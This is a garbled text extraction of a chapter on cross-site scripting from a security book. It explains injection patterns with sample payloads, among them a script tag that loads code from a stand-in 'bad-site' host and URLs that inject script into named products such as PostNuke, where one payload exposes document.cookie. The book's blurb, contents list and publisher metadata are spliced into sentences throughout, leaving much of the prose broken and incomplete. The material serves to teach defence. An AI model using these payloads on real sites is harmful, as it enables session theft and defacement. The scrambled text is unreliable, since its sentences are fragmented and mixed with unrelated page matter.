Cross-site Scripting (XSS)
Cross-site scripting (XSS) has become a popular subject in security, but XSS is really only yet a example of in-band signals being interpreted by client software—in this case, the Web browser. popular attack because Web sites are both common and numerous.
•Table of Contents
To• carry outIndexan XSS attack, an attacker can place a booby trap within data using special escape isExploitinga modernSoftwareformHowof usingto BreakterminalCode escape codes in filenames or talk requests. The terminal, in
the Web browser that includes advanced features such as the capability to run embedded Javas
ByGreg Hoglund,Gary McGraw
attack can inject some toxic Javascript or some other mobile code element into data that are lat
executed by another user of the server. The code executes on the victim's client machine, some
Publisher: Addison Wesley
causing havoc for the victim. Figure 5-1 shows an example of Web-based XSS in action.
Pub Date: February 17, 2004
ISBN: 0-201-78695-8
Pages: 512
Figure 5-1. XSS illustrated. The attacker sends active content to a vic which invokes a script on the vulnerable Web site (2). Later, once inv Web browser, hitting the vulnerable Web site (3), the script runs (
allows the attacker access (5).
How does software break? How do attackers make software break on purpose? Why are
firewalls, intrusion detection |
guys? |
What tools can be used |
|
Exploiting Softwareis |
and |
techniques used by bad |
from |
attack, you must first |
|
This must-have book may |
the |
script kiddie treatment |
|
Why software exploit |
|
When network |
|
Attack patterns |
|
Reverse engineering |
|
Classic attacks |
|
Surprising attacks |
|
Techniques for |
|
The technical details |
|
Rootkits |
|
Exploiting Softwareis |
break |
software. |
|
In some cases an attacker may be able to include a script such as the following in a payload:
<script SRC='http://bad-site/badfile'></SCRIPT>
•Table of Contents
•Index
InExplothistingcaseSoftwarethe scriptHow tosourceBreak Codeis obtained from an outside system. The final script, however, is e
the security context of the browser–server connection of the original site. The "cross-site" label
ByGreg Hoglund,Gary McGraw
originates from the fact that the script source is obtained from an outside, untrusted source.
Publisher: Addison Wesley
Pub Date: February 17, 2004
* Attack Example: Javascript Alert Dialog XXS
ISBN: 0-201-78695-8
Pages: 512
One innocuous kind of XSS attack causes a pop-up dialog to spin, saying whatever the attacker This is commonly used as a test against a site. An attacker simply inserts the following script co forms on the target site:
How does software break? How do attackers make software break on purpose? Why are firewalls, intrusion detection systems, and antivirus software not keeping out the bad guys? What tools can be used to break software? This book provides the answers.
Exploiting Softwareis loaded with examples of real attacks, attack patterns, tools, and techniques used by bad guys to break software. If you want to protect your software from attack, you must first learn how real attacks are really carried out.
<script>alert("some text");</script>
This must-have book may shock you—and it will certainly educate you.Getting beyond the script kiddie treatment found in many hacking books, you will learn about
Why software exploit will continue to be a serious problem
When viewing subsequent pages, the attacker expects that a dialog box with "some text" will po
When network security mechanisms do not work
Attack patterns
Using Reflection against Trusted Sites
Reverse engineering
Consider a situation in which an attacker sends e-mail that contains an embedded script. The vi not
trustClassictheattackse-mail messageagainst serverand maysoftwarethus have scripting disabled. The attack therefore fails.
Now assumeSurprisingthatattacksthe sameagainstvic imclientusesoftwarepopular on-line system. The attacker may know that t
uses and trusts the on-line system. The attacker may also have found an XSS vulnerability on t
Techniques for crafting malicious input
system. Armed with this knowledge, the attacker can send e-mail with a link to the trusted targ
embedded. The link may contain data that are posted to the target site, doing something such
The technical details of buffer overflows message. The link may look something like
Rootkits
Exploiting Softwareis filled with the tools, concepts, and knowledge necessary to break
software.
<a href="trusted.site.com/cgi-bin/post_message.pl?my message goes here">click m
If the victim clicks the link, the message "my message goes here" will be posted to the target si target site will then display the message back to the victim. This is a very common form of XSS Thus, a cross-site problem on the target site can be used to echo script back to the victim. The contained in the e-mail itself, but is instead "bounced" off the target site. Once the victim views that were posted, the script becomes active in the victim's browser.
•Table of Contents
The following link may result in a Javascript pop-up message:
•Index
Exploiting Software How to Break Code
ByGreg Hoglund,Gary McGraw
Publisher: Addison Wesley
Pub Date: February 17, 2004
ISBN: 0-201-78695-8
Pages: 512
<a href="trusted.site.com/cgi-bin/post_message.pl?<script>alert('hello!')&l
/script>">click me</a>
How does software break? How do attackers make software break on purpose? Why are firewalls, intrusion detection systems, and antivirus software not keeping out the bad guys? What tools can be used to break software? This book provides the answers.
The message posted to the server is
Exploiting Softwareis loaded with examples of real attacks, attack patterns, tools, and techniques used by bad guys to break software. If you want to protect your software from attack, you must first learn how real attacks are really carried out.
This must-have book may shock you—and it will certainly educate you.Getting beyond the script kiddie treatment found in many hacking books, you will learn about
Why software exploit will continue to be a serious problem
<script>alert('hello!')</script>
When network security mechanisms do not work
Attack patterns
Reverse engineering
and the target server is likely to convert this text (because of the escape characters) to 
Classic attacks against server software
Surprising attacks against client software
Techniques for crafting malicious input
The technical details of buffer overflows
Rootkits
<script>alert('hello!')</script>
Exploiting Softwareis filled with the tools, concepts, and knowledge necessary to break software.
Thus, when the victim views the result of their post, their browser is given script code to execut
Exploiting Software How to Break Code
|
Attack Pattern: Simple Script Injection |
|
As a normal user of a system there are opportunities to supply input to the system. This input |
• |
may include text, numbers, cookies, parameters, and so forth. Once these values are accepted |
Table of Contents |
|
by the system, they may be stored and used later. If the data are used in a server response |
•Index
(such as a message board, where the data are stored and then displayed back to users), an attacker can "pollute" these data with code that will be interpreted by unsuspecting client
ByGreg Hoglund,Gary McGraw terminals.
Publisher: Addison Wesley
Pub Date: February 17, 2004
* Attack Example: Simple Script Injection
ISBN: 0-201-78695-8
Pages: 512
If a database stores text records, an attacker can insert a record that contains Javascript. The J might be something like
How does software break? How do attackers make software break on purpose? Why are firewalls, intrusion detection systems, and antivirus software not keeping out the bad guys? What tools can be used to break software? This book provides the answers.
Exploiting Softwareis loaded with examples of real attacks, attack patterns, tools, and techniques used by bad guys to break software. If you want to protect your software from
attack, you must first learn how real attacks are really carried out.
<script>alert("Warning, boot sector corrupted");</script>
This must-have book may shock you—and it will certainly educate you.Getting beyond the script kiddie treatment found in many hacking books, you will learn about
This causeWhy softwarepop-upexploitmessagewill contheinueclientto beterminalseriousthatproblemdisplays the (fake) error message. An unsuspecting user might be highly confused by this. A more insidious attack might include a scr files onWhenthe networkclient hardsecuritydrive ormechanismsproxy attackdo not. work
ICQ (aAttacklargepatternscompany acquired by AOL) had a problem like this on their Web site. A user could
malicious HTML code or script into a message that would later be displayed to other users. The
Reverse engineering looked something like this:
Classic attacks against server software
Surprising attacks against client software
Techniques for crafting malicious input
The technical details of buffer overflows
Rootkits http://search.icq.com/dirsearch.adp?query<script>alert('hello');</script>est&wh
Exploiting Softwareis filled with the tools, concepts, and knowledge necessary to break software.
Many Web sites that maintain guest books or message bases suffer from these problems. The p news site Slashdot.org, for example, had such a problem (recently corrected). Testing for this p simple: The attacker pastes script into an input field and observes the result.
Attack Pattern: Embedding Script in Nonscript Elements
Script does not need to be inserted between <script> tags. Instead, script can appear as part of another HTML tag, such as the image tag. The injection vector is
•Table of Contents
•Index
Exploiting Software How to Break Code
ByGreg Hoglund,Gary McGraw
Publisher: Addison Wesley
Pub Date: February 17, 2004
ISBN: 0-201-78695-8
<img src=javascript:alert(document.domain)>
Pages: 512
How does software break? How do attackers make software break on purpose? Why are
firewalls, intrusion detection systems, and antivirus software not keeping out the bad guys?
* Attack Example: Embedded Script in Nonscript Element from GNU Mailman XXS
What tools can be used to break software? This book provides the answers.
Consider the following URL:
Exploiting Softwareis loaded with examples of real attacks, attack patterns, tools, and techniques used by bad guys to break software. If you want to protect your software from attack, you must first learn how real attacks are really carried out.
This must-have book may shock you—and it will certainly educate you.Getting beyond the script kiddie treatment found in many hacking books, you will learn about
Why software exploit will continue to be a serious problem
When network security mechanisms do not work
Attack patterns
Reverse engineering
Classic attacks against server software
Surprising attacks against client software
Techniques for crafting malicious input
The technical details of buffer overflows
Rootkits
Exploiting Softwareis filled with the tools, concepts, and knowledge necessary to break
software.
http://host/mailman/listinfo/<img%20src=user_inserted_script>
•Table of Contents
•Index
Exploiting Software How to Break Code
ByGreg Hoglund,Gary McGraw
Attack Pattern: XSS in HTTP Headers
Publisher: Addison Wesley
Pub Date: February 17, 2004
The HTTP headers of a request are always available to a server for consumption. No matter th
ISBN: 0-201-78695-8
context or where data are positioned, if the data are from the client, they should clearly be untrustedPag :.512However, in many cases programmers overlook header information. For some reason header information is treated as holy ground that cannot be controlled by the user. Thi pattern takes advantage of this oversight to inject data via a header field.
How does software break? How do attackers make software break on purpose? Why are
* Attack Example: HTTP Headers in Webalizer XSS
firewalls, intrusion detection systems, and antivirus software not keeping out the bad guys? What tools can be used to break software? This book provides the answers.
A program called webalizer can analyze logs of Web requests. Sometimes search engines will p
Softwareis loaded with |
of real attacks, attack patterns, tools, and |
Exploitingdata the Referrer field when they makeexamplesrequest. Webalizer can (for example) search all req |
techniques used by bad guys to |
. If you want to protect your software from |
from search engines and compilebreaklistsoftwsearch keywords. The keywords, once obtained, are c
anttack, you must first learn how real attacks are really carried out. HTML page.
This must-have book may shock you—and it will certainly educate you.Getting beyond the
An XSS attack can execute via these search terms. This involves faking a request from a search
script kiddie treatment found in many hacking books, you will learn about
putting embedded script into the search term itself. Webalizer copies the attack string, unfiltere catalog of known search terms, where it is then activated by an administrator.
Why software exploit will continue to be a serious problem
When network security mechanisms do not work
AttackPattern:patt s HTTP Query Strings
Reverse engineering
A query string takes variable = value pairs. These are passed to the target executable or scrip
designated in the request. A variable can be injected with script. The script is processed and Classic attacks against server software
stored in a way that is later visible to a user.
Surprising attacks against client software
Techniques for crafting malicious input
* Attack Example: PostNuke Content Management System XSS
The technical details of buffer overflows
The PostNuke content management system (http://www.postnuke.com/ ) had a vulnerability in
Rootkits
supplied HTML could be injected. The following URL carried out a simple query string attack:
http://[website]/user.php?op=userinfo&uname=<script>alert(document.cookie);</script>. Exploiting Softwareis filled with the tools, concepts, and knowledge necessary to break
software.
* Attack Example: EasyNews PHP Script XSS
The following HTML request could at one time cause a post to be made, which includes an XSS
http://[target]/index.php?action=comments&do=save&id=1&cid=../news&
name=11/11/11&kommentar=%20&e-mail=hax0r&zeit=<img src=javascript:alert(documen
•Table of Contents
,11:11,• ../news,Index
Exploiting Software How to Break Code
bugs@securityalert.=com&datum=easynews%20exploited
ByGreg Hoglund,Gary McGraw
Publisher: Addison Wesley
Pub Date: February 17, 2004
ISBN: 0-201-78695-8
Pages: 512
Attack Pattern: User-Controlled Filename
An unfiltered, user-controlled filename can be used to construct client HTML. Perhaps HTML
text is being built from filenames. This can be the case if a Web server is exposing a directory How does software break? How do attackers make software break on purpose? Why are
on the file system, for example. If the server does not filter certain characters, the filename firewalls, intrusion detection systems, and antivirus software not keeping out the bad guys?
itself can include an XSS attack.
What tools can be used to break software? This book provides the answers.
Exploiting Softwareis loaded with examples of real attacks, attack patterns, tools, and
techniques used by bad guys to break software. If you want to protect your software from
* Attack Example: XSS in MP3 Files and Spreadsheets
attack, you must first learn how real attacks are really carried out.
This must-have book may shock you—and it will certainly educate you.Getting beyond the
The cross-site problem is not confined to Web sites alone. There are many types of media files t
script kiddie treatment found in many hacking books, you will learn about
URLs, including MP3 music files, video files, postscripts, PDFs, and even spreadsheet files. The c programs used to view these kinds of files may interpret the embedded URL data directly or ma
the HTML data to an embedded Web browser, such as the Microsoft Internet Explorer control. O
Why software exploit will continue to be a serious problem
is transferred, the embedded data are subject to the same problems as in a traditional XSS atta
When network security mechanisms do not work
Microsoft considers the XSS problem extremely serious and devotes considerable attention to er
XSS vulnerabilities during their self-described "security push" phase of software development.[3 
Attack patterns
[3] The book Writing Secure Code [Howard and LeBlanc, 2002] describes how security has been integrated in
Reverse engineering software development life cycle.
Classic attacks against server software
Surprising attacks against client software
Techniques for crafting malicious input
The technical details of buffer overflows
Rootkits
Exploiting Softwareis filled with the tools, concepts, and knowledge necessary to break software.
